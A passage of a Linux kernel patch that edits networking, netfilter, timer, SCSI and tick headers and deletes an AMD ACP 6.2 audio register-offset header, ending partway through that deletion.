+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -9063,7 +9063,8 @@ struct mlx5_ifc_alloc_flow_counter_in_bits {
+ 	u8         reserved_at_20[0x10];
+ 	u8         op_mod[0x10];
+ 
+-	u8         reserved_at_40[0x38];
++	u8         reserved_at_40[0x33];
++	u8         flow_counter_bulk_log_size[0x5];
+ 	u8         flow_counter_bulk[0x8];
+ };
+ 
+diff --git a/include/linux/netfilter/nfnetlink.h b/include/linux/netfilter/nfnetlink.h
+index 241e005f290ad..e9a9ab34a7ccc 100644
+--- a/include/linux/netfilter/nfnetlink.h
++++ b/include/linux/netfilter/nfnetlink.h
+@@ -45,7 +45,6 @@ struct nfnetlink_subsystem {
+ 	int (*commit)(struct net *net, struct sk_buff *skb);
+ 	int (*abort)(struct net *net, struct sk_buff *skb,
+ 		     enum nfnl_abort_action action);
+-	void (*cleanup)(struct net *net);
+ 	bool (*valid_genid)(struct net *net, u32 genid);
+ };
+ 
+diff --git a/include/linux/posix-timers.h b/include/linux/posix-timers.h
+index 2c6e99ca48afc..d607f51404fca 100644
+--- a/include/linux/posix-timers.h
++++ b/include/linux/posix-timers.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/spinlock.h>
+ #include <linux/list.h>
++#include <linux/mutex.h>
+ #include <linux/alarmtimer.h>
+ #include <linux/timerqueue.h>
+ 
+@@ -62,16 +63,18 @@ static inline int clockid_to_fd(const clockid_t clk)
+  * cpu_timer - Posix CPU timer representation for k_itimer
+  * @node:	timerqueue node to queue in the task/sig
+  * @head:	timerqueue head on which this timer is queued
+- * @task:	Pointer to target task
++ * @pid:	Pointer to target task PID
+  * @elist:	List head for the expiry list
+  * @firing:	Timer is currently firing
++ * @handling:	Pointer to the task which handles expiry
+  */
+ struct cpu_timer {
+-	struct timerqueue_node	node;
+-	struct timerqueue_head	*head;
+-	struct pid		*pid;
+-	struct list_head	elist;
+-	int			firing;
++	struct timerqueue_node		node;
++	struct timerqueue_head		*head;
++	struct pid			*pid;
++	struct list_head		elist;
++	int				firing;
++	struct task_struct __rcu	*handling;
+ };
+ 
+ static inline bool cpu_timer_enqueue(struct timerqueue_head *head,
+@@ -135,10 +138,12 @@ struct posix_cputimers {
+ /**
+  * posix_cputimers_work - Container for task work based posix CPU timer expiry
+  * @work:	The task work to be scheduled
++ * @mutex:	Mutex held around expiry in context of this task work
+  * @scheduled:  @work has been scheduled already, no further processing
+  */
+ struct posix_cputimers_work {
+ 	struct callback_head	work;
++	struct mutex		mutex;
+ 	unsigned int		scheduled;
+ };
+ 
+diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h
+index b8ca3ecaf8d76..8ada7dc802d30 100644
+--- a/include/linux/sunrpc/sched.h
++++ b/include/linux/sunrpc/sched.h
+@@ -90,8 +90,7 @@ struct rpc_task {
+ #endif
+ 	unsigned char		tk_priority : 2,/* Task priority */
+ 				tk_garb_retry : 2,
+-				tk_cred_retry : 2,
+-				tk_rebind_retry : 2;
++				tk_cred_retry : 2;
+ };
+ 
+ typedef void			(*rpc_action)(struct rpc_task *);
+diff --git a/include/linux/tick.h b/include/linux/tick.h
+index bfd571f18cfdc..9459fef5b8573 100644
+--- a/include/linux/tick.h
++++ b/include/linux/tick.h
+@@ -216,6 +216,7 @@ extern void tick_nohz_dep_set_signal(struct task_struct *tsk,
+ 				     enum tick_dep_bits bit);
+ extern void tick_nohz_dep_clear_signal(struct signal_struct *signal,
+ 				       enum tick_dep_bits bit);
++extern bool tick_nohz_cpu_hotpluggable(unsigned int cpu);
+ 
+ /*
+  * The below are tick_nohz_[set,clear]_dep() wrappers that optimize off-cases
+@@ -280,6 +281,7 @@ static inline void tick_nohz_full_add_cpus_to(struct cpumask *mask) { }
+ 
+ static inline void tick_nohz_dep_set_cpu(int cpu, enum tick_dep_bits bit) { }
+ static inline void tick_nohz_dep_clear_cpu(int cpu, enum tick_dep_bits bit) { }
++static inline bool tick_nohz_cpu_hotpluggable(unsigned int cpu) { return true; }
+ 
+ static inline void tick_dep_set(enum tick_dep_bits bit) { }
+ static inline void tick_dep_clear(enum tick_dep_bits bit) { }
+diff --git a/include/linux/vt_buffer.h b/include/linux/vt_buffer.h
+index 848db1b1569ff..919d999a8c1db 100644
+--- a/include/linux/vt_buffer.h
++++ b/include/linux/vt_buffer.h
+@@ -16,7 +16,7 @@
+ 
+ #include <linux/string.h>
+ 
+-#if defined(CONFIG_VGA_CONSOLE) || defined(CONFIG_MDA_CONSOLE)
++#if IS_ENABLED(CONFIG_VGA_CONSOLE) || IS_ENABLED(CONFIG_MDA_CONSOLE)
+ #include <asm/vga.h>
+ #endif
+ 
+diff --git a/include/net/bond_alb.h b/include/net/bond_alb.h
+index 191c36afa1f4a..9dc082b2d5430 100644
+--- a/include/net/bond_alb.h
++++ b/include/net/bond_alb.h
+@@ -156,8 +156,8 @@ int bond_alb_init_slave(struct bonding *bond, struct slave *slave);
+ void bond_alb_deinit_slave(struct bonding *bond, struct slave *slave);
+ void bond_alb_handle_link_change(struct bonding *bond, struct slave *slave, char link);
+ void bond_alb_handle_active_change(struct bonding *bond, struct slave *new_slave);
+-int bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
+-int bond_tlb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
++netdev_tx_t bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
++netdev_tx_t bond_tlb_xmit(struct sk_buff *skb, struct net_device *bond_dev);
+ struct slave *bond_xmit_alb_slave_get(struct bonding *bond,
+ 				      struct sk_buff *skb);
+ struct slave *bond_xmit_tlb_slave_get(struct bonding *bond,
+diff --git a/include/net/netfilter/nf_conntrack_core.h b/include/net/netfilter/nf_conntrack_core.h
+index b2b9de70d9f4d..a36f87af415c2 100644
+--- a/include/net/netfilter/nf_conntrack_core.h
++++ b/include/net/netfilter/nf_conntrack_core.h
+@@ -90,7 +90,11 @@ static inline void __nf_ct_set_timeout(struct nf_conn *ct, u64 timeout)
+ {
+ 	if (timeout > INT_MAX)
+ 		timeout = INT_MAX;
+-	WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++
++	if (nf_ct_is_confirmed(ct))
++		WRITE_ONCE(ct->timeout, nfct_time_stamp + (u32)timeout);
++	else
++		ct->timeout = (u32)timeout;
+ }
+ 
+ int __nf_ct_change_timeout(struct nf_conn *ct, u64 cta_timeout);
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 6bacbf57ac175..a1ccf1276f3ee 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -614,6 +614,7 @@ struct nft_set_binding {
+ };
+ 
+ enum nft_trans_phase;
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase);
+diff --git a/include/net/scm.h b/include/net/scm.h
+index 1ce365f4c2560..585adc1346bd0 100644
+--- a/include/net/scm.h
++++ b/include/net/scm.h
+@@ -105,16 +105,27 @@ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct sc
+ 		}
+ 	}
+ }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return test_bit(SOCK_PASSSEC, &sock->flags);
++}
+ #else
+ static inline void scm_passec(struct socket *sock, struct msghdr *msg, struct scm_cookie *scm)
+ { }
++
++static inline bool scm_has_secdata(struct socket *sock)
++{
++	return false;
++}
+ #endif /* CONFIG_SECURITY_NETWORK */
+ 
+ static __inline__ void scm_recv(struct socket *sock, struct msghdr *msg,
+ 				struct scm_cookie *scm, int flags)
+ {
+ 	if (!msg->msg_control) {
+-		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp)
++		if (test_bit(SOCK_PASSCRED, &sock->flags) || scm->fp ||
++		    scm_has_secdata(sock))
+ 			msg->msg_flags |= MSG_CTRUNC;
+ 		scm_destroy(scm);
+ 		return;
+diff --git a/include/net/xsk_buff_pool.h b/include/net/xsk_buff_pool.h
+index f787c3f524b03..996eaf1ef1a1d 100644
+--- a/include/net/xsk_buff_pool.h
++++ b/include/net/xsk_buff_pool.h
+@@ -175,13 +175,8 @@ static inline bool xp_desc_crosses_non_contig_pg(struct xsk_buff_pool *pool,
+ 	if (likely(!cross_pg))
+ 		return false;
+ 
+-	if (pool->dma_pages_cnt) {
+-		return !(pool->dma_pages[addr >> PAGE_SHIFT] &
+-			 XSK_NEXT_PG_CONTIG_MASK);
+-	}
+-
+-	/* skb path */
+-	return addr + len > pool->addrs_cnt;
++	return pool->dma_pages_cnt &&
++	       !(pool->dma_pages[addr >> PAGE_SHIFT] & XSK_NEXT_PG_CONTIG_MASK);
+ }
+ 
+ static inline u64 xp_aligned_extract_addr(struct xsk_buff_pool *pool, u64 addr)
+diff --git a/include/scsi/sas_ata.h b/include/scsi/sas_ata.h
+index ec646217e7f6e..e7d466df81576 100644
+--- a/include/scsi/sas_ata.h
++++ b/include/scsi/sas_ata.h
+@@ -32,6 +32,7 @@ void sas_probe_sata(struct asd_sas_port *port);
+ void sas_suspend_sata(struct asd_sas_port *port);
+ void sas_resume_sata(struct asd_sas_port *port);
+ void sas_ata_end_eh(struct ata_port *ap);
++void sas_ata_device_link_abort(struct domain_device *dev, bool force_reset);
+ int sas_execute_ata_cmd(struct domain_device *device, u8 *fis,
+ 			int force_phy_id);
+ int sas_ata_wait_after_reset(struct domain_device *dev, unsigned long deadline);
+@@ -88,6 +89,11 @@ static inline void sas_ata_end_eh(struct ata_port *ap)
+ {
+ }
+ 
++static inline void sas_ata_device_link_abort(struct domain_device *dev,
++					     bool force_reset)
++{
++}
++
+ static inline int sas_execute_ata_cmd(struct domain_device *device, u8 *fis,
+ 				      int force_phy_id)
+ {
+diff --git a/include/sound/acp62_chip_offset_byte.h b/include/sound/acp62_chip_offset_byte.h
+deleted file mode 100644
+index f03992f81168b..0000000000000
+--- a/include/sound/acp62_chip_offset_byte.h
++++ /dev/null
+@@ -1,444 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * AMD ACP 6.2 Register Documentation
+- *
+- * Copyright 2022 Advanced Micro Devices, Inc.
+- */
+-
+-#ifndef _acp_ip_OFFSET_HEADER
+-#define _acp_ip_OFFSET_HEADER
+-
+-/* Registers from ACP_DMA block */
+-#define ACP_DMA_CNTL_0                                0x0000000
+-#define ACP_DMA_CNTL_1                                0x0000004
+-#define ACP_DMA_CNTL_2                                0x0000008
+-#define ACP_DMA_CNTL_3                                0x000000C
+-#define ACP_DMA_CNTL_4                                0x0000010
+-#define ACP_DMA_CNTL_5                                0x0000014
+-#define ACP_DMA_CNTL_6                                0x0000018
+-#define ACP_DMA_CNTL_7                                0x000001C
+-#define ACP_DMA_DSCR_STRT_IDX_0                       0x0000020
+-#define ACP_DMA_DSCR_STRT_IDX_1                       0x0000024
+-#define ACP_DMA_DSCR_STRT_IDX_2                       0x0000028
+-#define ACP_DMA_DSCR_STRT_IDX_3                       0x000002C
+-#define ACP_DMA_DSCR_STRT_IDX_4                       0x0000030
+-#define ACP_DMA_DSCR_STRT_IDX_5                       0x0000034
+-#define ACP_DMA_DSCR_STRT_IDX_6                       0x0000038
+-#define ACP_DMA_DSCR_STRT_IDX_7                       0x000003C
+-#define ACP_DMA_DSCR_CNT_0                            0x0000040
+-#define ACP_DMA_DSCR_CNT_1                            0x0000044
+-#define ACP_DMA_DSCR_CNT_2                            0x0000048
+-#define ACP_DMA_DSCR_CNT_3                            0x000004C
+-#define ACP_DMA_DSCR_CNT_4                            0x0000050
+-#define ACP_DMA_DSCR_CNT_5                            0x0000054
+-#define ACP_DMA_DSCR_CNT_6                            0x0000058
+-#define ACP_DMA_DSCR_CNT_7                            0x000005C
+-#define ACP_DMA_PRIO_0                                0x0000060
+-#define ACP_DMA_PRIO_1                                0x0000064
+-#define ACP_DMA_PRIO_2                                0x0000068
+-#define ACP_DMA_PRIO_3                                0x000006C
+-#define ACP_DMA_PRIO_4                                0x0000070
+-#define ACP_DMA_PRIO_5                                0x0000074
+-#define ACP_DMA_PRIO_6                                0x0000078
+-#define ACP_DMA_PRIO_7                                0x000007C
+-#define ACP_DMA_CUR_DSCR_0                            0x0000080
+-#define ACP_DMA_CUR_DSCR_1                            0x0000084
+-#define ACP_DMA_CUR_DSCR_2                            0x0000088
+-#define ACP_DMA_CUR_DSCR_3                            0x000008C
+-#define ACP_DMA_CUR_DSCR_4                            0x0000090
+-#define ACP_DMA_CUR_DSCR_5                            0x0000094
+-#define ACP_DMA_CUR_DSCR_6                            0x0000098
+-#define ACP_DMA_CUR_DSCR_7                            0x000009C
+-#define ACP_DMA_CUR_TRANS_CNT_0                       0x00000A0
+-#define ACP_DMA_CUR_TRANS_CNT_1                       0x00000A4
+-#define ACP_DMA_CUR_TRANS_CNT_2                       0x00000A8
+-#define ACP_DMA_CUR_TRANS_CNT_3                       0x00000AC
+-#define ACP_DMA_CUR_TRANS_CNT_4                       0x00000B0
+-#define ACP_DMA_CUR_TRANS_CNT_5                       0x00000B4
+-#define ACP_DMA_CUR_TRANS_CNT_6                       0x00000B8
+-#define ACP_DMA_CUR_TRANS_CNT_7                       0x00000BC
+-#define ACP_DMA_ERR_STS_0                             0x00000C0
+-#define ACP_DMA_ERR_STS_1                             0x00000C4
+-#define ACP_DMA_ERR_STS_2                             0x00000C8
+-#define ACP_DMA_ERR_STS_3                             0x00000CC
+-#define ACP_DMA_ERR_STS_4                             0x00000D0
+-#define ACP_DMA_ERR_STS_5                             0x00000D4
+-#define ACP_DMA_ERR_STS_6                             0x00000D8
+-#define ACP_DMA_ERR_STS_7                             0x00000DC
+-#define ACP_DMA_DESC_BASE_ADDR                        0x00000E0
+-#define ACP_DMA_DESC_MAX_NUM_DSCR                     0x00000E4
+-#define ACP_DMA_CH_STS                                0x00000E8
+-#define ACP_DMA_CH_GROUP                              0x00000EC
+-#define ACP_DMA_CH_RST_STS                            0x00000F0
+-
+-/* Registers from ACP_AXI2AXIATU block */
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_1                0x0000C00
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_1                0x0000C04
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_2                0x0000C08
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_2                0x0000C0C
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_3                0x0000C10
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_3                0x0000C14
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_4                0x0000C18
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_4                0x0000C1C
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_5                0x0000C20
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_5                0x0000C24
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_6                0x0000C28
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_6                0x0000C2C
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_7                0x0000C30
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_7                0x0000C34
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_8                0x0000C38
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_8                0x0000C3C
+-#define ACPAXI2AXI_ATU_CTRL                           0x0000C40
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_9                0x0000C44
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_9                0x0000C48
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_10               0x0000C4C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_10               0x0000C50
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_11               0x0000C54
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_11               0x0000C58
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_12               0x0000C5C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_12               0x0000C60
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_13               0x0000C64
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_13               0x0000C68
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_14               0x0000C6C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_14               0x0000C70
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_15               0x0000C74
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_15               0x0000C78
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_16               0x0000C7C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_16               0x0000C80
+-
+-/* Registers from ACP_CLKRST block */
+-#define ACP_SOFT_RESET                                0x0001000
+-#define ACP_CONTROL                                   0x0001004
+-#define ACP_STATUS                                    0x0001008
+-#define ACP_DYNAMIC_CG_MASTER_CONTROL                 0x0001010
+-#define ACP_ZSC_DSP_CTRL                              0x0001014
+-#define ACP_ZSC_STS                                   0x0001018
+-#define ACP_PGFSM_CONTROL                             0x0001024
+-#define ACP_PGFSM_STATUS                              0x0001028
+-#define ACP_CLKMUX_SEL                                0x000102C
+-
+-/* Registers from ACP_AON block */
+-#define ACP_PME_EN                                    0x0001400
+-#define ACP_DEVICE_STATE                              0x0001404
+-#define AZ_DEVICE_STATE                               0x0001408
+-#define ACP_PIN_CONFIG                                0x0001440
+-#define ACP_PAD_PULLUP_CTRL                           0x0001444
+-#define ACP_PAD_PULLDOWN_CTRL                         0x0001448
+-#define ACP_PAD_DRIVE_STRENGTH_CTRL                   0x000144C
+-#define ACP_PAD_SCHMEN_CTRL                           0x0001450
+-#define ACP_SW_PAD_KEEPER_EN                          0x0001454
+-#define ACP_SW_WAKE_EN                                0x0001458
+-#define ACP_I2S_WAKE_EN                               0x000145C
+-#define ACP_SW1_WAKE_EN                               0x0001460
+-
+-/* Registers from ACP_P1_MISC block */
+-#define ACP_EXTERNAL_INTR_ENB                         0x0001A00
+-#define ACP_EXTERNAL_INTR_CNTL                        0x0001A04
+-#define ACP_EXTERNAL_INTR_CNTL1                       0x0001A08
+-#define ACP_EXTERNAL_INTR_STAT                        0x0001A0C
+-#define ACP_EXTERNAL_INTR_STAT1                       0x0001A10
+-#define ACP_ERROR_STATUS                              0x0001A4C
+-#define ACP_P1_SW_I2S_ERROR_REASON                    0x0001A50
+-#define ACP_P1_SW_POS_TRACK_I2S_TX_CTRL               0x0001A6C
+-#define ACP_P1_SW_I2S_TX_DMA_POS                      0x0001A70
+-#define ACP_P1_SW_POS_TRACK_I2S_RX_CTRL               0x0001A74
+-#define ACP_P1_SW_I2S_RX_DMA_POS                      0x0001A78
+-#define ACP_P1_DMIC_I2S_GPIO_INTR_CTRL                0x0001A7C
+-#define ACP_P1_DMIC_I2S_GPIO_INTR_STATUS              0x0001A80
+-#define ACP_SCRATCH_REG_BASE_ADDR                     0x0001A84
+-#define ACP_P1_SW_POS_TRACK_BT_TX_CTRL                0x0001A88
+-#define ACP_P1_SW_BT_TX_DMA_POS                       0x0001A8C
+-#define ACP_P1_SW_POS_TRACK_HS_TX_CTRL                0x0001A90
+-#define ACP_P1_SW_HS_TX_DMA_POS                       0x0001A94
+-#define ACP_P1_SW_POS_TRACK_BT_RX_CTRL                0x0001A98
+-#define ACP_P1_SW_BT_RX_DMA_POS                       0x0001A9C
+-#define ACP_P1_SW_POS_TRACK_HS_RX_CTRL                0x0001AA0
+-#define ACP_P1_SW_HS_RX_DMA_POS                       0x0001AA4
+-
+-/* Registers from ACP_AUDIO_BUFFERS block */
+-#define ACP_I2S_RX_RINGBUFADDR                        0x0002000
+-#define ACP_I2S_RX_RINGBUFSIZE                        0x0002004
+-#define ACP_I2S_RX_LINKPOSITIONCNTR                   0x0002008
+-#define ACP_I2S_RX_FIFOADDR                           0x000200C
+-#define ACP_I2S_RX_FIFOSIZE                           0x0002010
+-#define ACP_I2S_RX_DMA_SIZE                           0x0002014
+-#define ACP_I2S_RX_LINEARPOSITIONCNTR_HIGH            0x0002018
+-#define ACP_I2S_RX_LINEARPOSITIONCNTR_LOW             0x000201C
+-#define ACP_I2S_RX_INTR_WATERMARK_SIZE                0x0002020
+-#define ACP_I2S_TX_RINGBUFADDR                        0x0002024
+-#define ACP_I2S_TX_RINGBUFSIZE                        0x0002028
+-#define ACP_I2S_TX_LINKPOSITIONCNTR                   0x000202C
+-#define ACP_I2S_TX_FIFOADDR                           0x0002030
+-#define ACP_I2S_TX_FIFOSIZE                           0x0002034
+-#define ACP_I2S_TX_DMA_SIZE                           0x0002038
+-#define ACP_I2S_TX_LINEARPOSITIONCNTR_HIGH            0x000203C
+-#define ACP_I2S_TX_LINEARPOSITIONCNTR_LOW             0x0002040
+-#define ACP_I2S_TX_INTR_WATERMARK_SIZE                0x0002044
+-#define ACP_BT_RX_RINGBUFADDR                         0x0002048
+-#define ACP_BT_RX_RINGBUFSIZE                         0x000204C
+-#define ACP_BT_RX_LINKPOSITIONCNTR                    0x0002050
+-#define ACP_BT_RX_FIFOADDR                            0x0002054
+-#define ACP_BT_RX_FIFOSIZE                            0x0002058
+-#define ACP_BT_RX_DMA_SIZE                            0x000205C
+-#define ACP_BT_RX_LINEARPOSITIONCNTR_HIGH             0x0002060
+-#define ACP_BT_RX_LINEARPOSITIONCNTR_LOW              0x0002064
+-#define ACP_BT_RX_INTR_WATERMARK_SIZE                 0x0002068
+-#define ACP_BT_TX_RINGBUFADDR                         0x000206C
+-#define ACP_BT_TX_RINGBUFSIZE                         0x0002070
+-#define ACP_BT_TX_LINKPOSITIONCNTR                    0x0002074
+-#define ACP_BT_TX_FIFOADDR                            0x0002078
+-#define ACP_BT_TX_FIFOSIZE                            0x000207C
+-#define ACP_BT_TX_DMA_SIZE                            0x0002080
+-#define ACP_BT_TX_LINEARPOSITIONCNTR_HIGH             0x0002084
+-#define ACP_BT_TX_LINEARPOSITIONCNTR_LOW              0x0002088
+-#define ACP_BT_TX_INTR_WATERMARK_SIZE                 0x000208C
+-#define ACP_HS_RX_RINGBUFADDR                         0x0002090
+-#define ACP_HS_RX_RINGBUFSIZE                         0x0002094
+-#define ACP_HS_RX_LINKPOSITIONCNTR                    0x0002098
+-#define ACP_HS_RX_FIFOADDR                            0x000209C
+-#define ACP_HS_RX_FIFOSIZE                            0x00020A0
+-#define ACP_HS_RX_DMA_SIZE                            0x00020A4
+-#define ACP_HS_RX_LINEARPOSITIONCNTR_HIGH             0x00020A8
+-#define ACP_HS_RX_LINEARPOSITIONCNTR_LOW              0x00020AC
+-#define ACP_HS_RX_INTR_WATERMARK_SIZE                 0x00020B0
+-#define ACP_HS_TX_RINGBUFADDR                         0x00020B4
+-#define ACP_HS_TX_RINGBUFSIZE                         0x00020B8
+-#define ACP_HS_TX_LINKPOSITIONCNTR                    0x00020BC
+-#define ACP_HS_TX_FIFOADDR                            0x00020C0
+-#define ACP_HS_TX_FIFOSIZE                            0x00020C4
+-#define ACP_HS_TX_DMA_SIZE                            0x00020C8
+-#define ACP_HS_TX_LINEARPOSITIONCNTR_HIGH             0x00020CC
+-#define ACP_HS_TX_LINEARPOSITIONCNTR_LOW              0x00020D0
+-#define ACP_HS_TX_INTR_WATERMARK_SIZE                 0x00020D4
+-
+-/* Registers from ACP_I2S_TDM block */
+-#define ACP_I2STDM_IER                                0x0002400
+-#define ACP_I2STDM_IRER                               0x0002404
+-#define ACP_I2STDM_RXFRMT                             0x0002408
+-#define ACP_I2STDM_ITER                               0x000240C
+-#define ACP_I2STDM_TXFRMT                             0x0002410
+-#define ACP_I2STDM0_MSTRCLKGEN                        0x0002414
+-#define ACP_I2STDM1_MSTRCLKGEN                        0x0002418
+-#define ACP_I2STDM2_MSTRCLKGEN                        0x000241C
+-#define ACP_I2STDM_REFCLKGEN                          0x0002420
+-
+-/* Registers from ACP_BT_TDM block */
+-#define ACP_BTTDM_IER                                 0x0002800
+-#define ACP_BTTDM_IRER                                0x0002804
+-#define ACP_BTTDM_RXFRMT                              0x0002808
+-#define ACP_BTTDM_ITER                                0x000280C
+-#define ACP_BTTDM_TXFRMT                              0x0002810
+-#define ACP_HSTDM_IER                                 0x0002814
+-#define ACP_HSTDM_IRER                                0x0002818
+-#define ACP_HSTDM_RXFRMT                              0x000281C
+-#define ACP_HSTDM_ITER                                0x0002820
+-#define ACP_HSTDM_TXFRMT                              0x0002824
+-
+-/* Registers from ACP_WOV block */
+-#define ACP_WOV_PDM_ENABLE                            0x0002C04
+-#define ACP_WOV_PDM_DMA_ENABLE                        0x0002C08
+-#define ACP_WOV_RX_RINGBUFADDR                        0x0002C0C
+-#define ACP_WOV_RX_RINGBUFSIZE                        0x0002C10
+-#define ACP_WOV_RX_LINKPOSITIONCNTR                   0x0002C14
+-#define ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH            0x0002C18
+-#define ACP_WOV_RX_LINEARPOSITIONCNTR_LOW             0x0002C1C
+-#define ACP_WOV_RX_INTR_WATERMARK_SIZE                0x0002C20
+-#define ACP_WOV_PDM_FIFO_FLUSH                        0x0002C24
+-#define ACP_WOV_PDM_NO_OF_CHANNELS                    0x0002C28
+-#define ACP_WOV_PDM_DECIMATION_FACTOR                 0x0002C2C
+-#define ACP_WOV_PDM_VAD_CTRL                          0x0002C30
+-#define ACP_WOV_WAKE                                  0x0002C54
+-#define ACP_WOV_BUFFER_STATUS                         0x0002C58
+-#define ACP_WOV_MISC_CTRL                             0x0002C5C
+-#define ACP_WOV_CLK_CTRL                              0x0002C60
+-#define ACP_PDM_VAD_DYNAMIC_CLK_GATING_EN             0x0002C64
+-#define ACP_WOV_ERROR_STATUS_REGISTER                 0x0002C68
+-#define ACP_PDM_CLKDIV                                0x0002C6C
+-
+-/* Registers from ACP_P1_AUDIO_BUFFERS block */
+-#define ACP_P1_I2S_RX_RINGBUFADDR                     0x0003A00
+-#define ACP_P1_I2S_RX_RINGBUFSIZE                     0x0003A04
+-#define ACP_P1_I2S_RX_LINKPOSITIONCNTR                0x0003A08
+-#define ACP_P1_I2S_RX_FIFOADDR                        0x0003A0C
+-#define ACP_P1_I2S_RX_FIFOSIZE                        0x0003A10
+-#define ACP_P1_I2S_RX_DMA_SIZE                        0x0003A14
+-#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_HIGH         0x0003A18
+-#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_LOW          0x0003A1C
+-#define ACP_P1_I2S_RX_INTR_WATERMARK_SIZE             0x0003A20
+-#define ACP_P1_I2S_TX_RINGBUFADDR                     0x0003A24
+-#define ACP_P1_I2S_TX_RINGBUFSIZE                     0x0003A28
+-#define ACP_P1_I2S_TX_LINKPOSITIONCNTR                0x0003A2C
+-#define ACP_P1_I2S_TX_FIFOADDR                        0x0003A30
+-#define ACP_P1_I2S_TX_FIFOSIZE                        0x0003A34
+-#define ACP_P1_I2S_TX_DMA_SIZE                        0x0003A38
+-#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_HIGH         0x0003A3C
+-#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_LOW          0x0003A40
+-#define ACP_P1_I2S_TX_INTR_WATERMARK_SIZE             0x0003A44
+-#define ACP_P1_BT_RX_RINGBUFADDR                      0x0003A48
+-#define ACP_P1_BT_RX_RINGBUFSIZE                      0x0003A4C
+-#define ACP_P1_BT_RX_LINKPOSITIONCNTR                 0x0003A50
+-#define ACP_P1_BT_RX_FIFOADDR                         0x0003A54
+-#define ACP_P1_BT_RX_FIFOSIZE                         0x0003A58
+-#define ACP_P1_BT_RX_DMA_SIZE                         0x0003A5C
+-#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_HIGH          0x0003A60
+-#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_LOW           0x0003A64
+-#define ACP_P1_BT_RX_INTR_WATERMARK_SIZE              0x0003A68
+-#define ACP_P1_BT_TX_RINGBUFADDR                      0x0003A6C
+-#define ACP_P1_BT_TX_RINGBUFSIZE                      0x0003A70
+-#define ACP_P1_BT_TX_LINKPOSITIONCNTR                 0x0003A74
+-#define ACP_P1_BT_TX_FIFOADDR                         0x0003A78
+-#define ACP_P1_BT_TX_FIFOSIZE                         0x0003A7C
+-#define ACP_P1_BT_TX_DMA_SIZE                         0x0003A80
+-#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_HIGH          0x0003A84
+-#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_LOW           0x0003A88
+-#define ACP_P1_BT_TX_INTR_WATERMARK_SIZE              0x0003A8C
+-#define ACP_P1_HS_RX_RINGBUFADDR                      0x0003A90
+-#define ACP_P1_HS_RX_RINGBUFSIZE                      0x0003A94
+-#define ACP_P1_HS_RX_LINKPOSITIONCNTR                 0x0003A98
+-#define ACP_P1_HS_RX_FIFOADDR                         0x0003A9C
+-#define ACP_P1_HS_RX_FIFOSIZE                         0x0003AA0
+-#define ACP_P1_HS_RX_DMA_SIZE                         0x0003AA4
+-#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_HIGH          0x0003AA8
+-#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_LOW           0x0003AAC
+-#define ACP_P1_HS_RX_INTR_WATERMARK_SIZE              0x0003AB0
+-#define ACP_P1_HS_TX_RINGBUFADDR                      0x0003AB4
+-#define ACP_P1_HS_TX_RINGBUFSIZE                      0x0003AB8
+-#define ACP_P1_HS_TX_LINKPOSITIONCNTR                 0x0003ABC
+-#define ACP_P1_HS_TX_FIFOADDR                         0x0003AC0
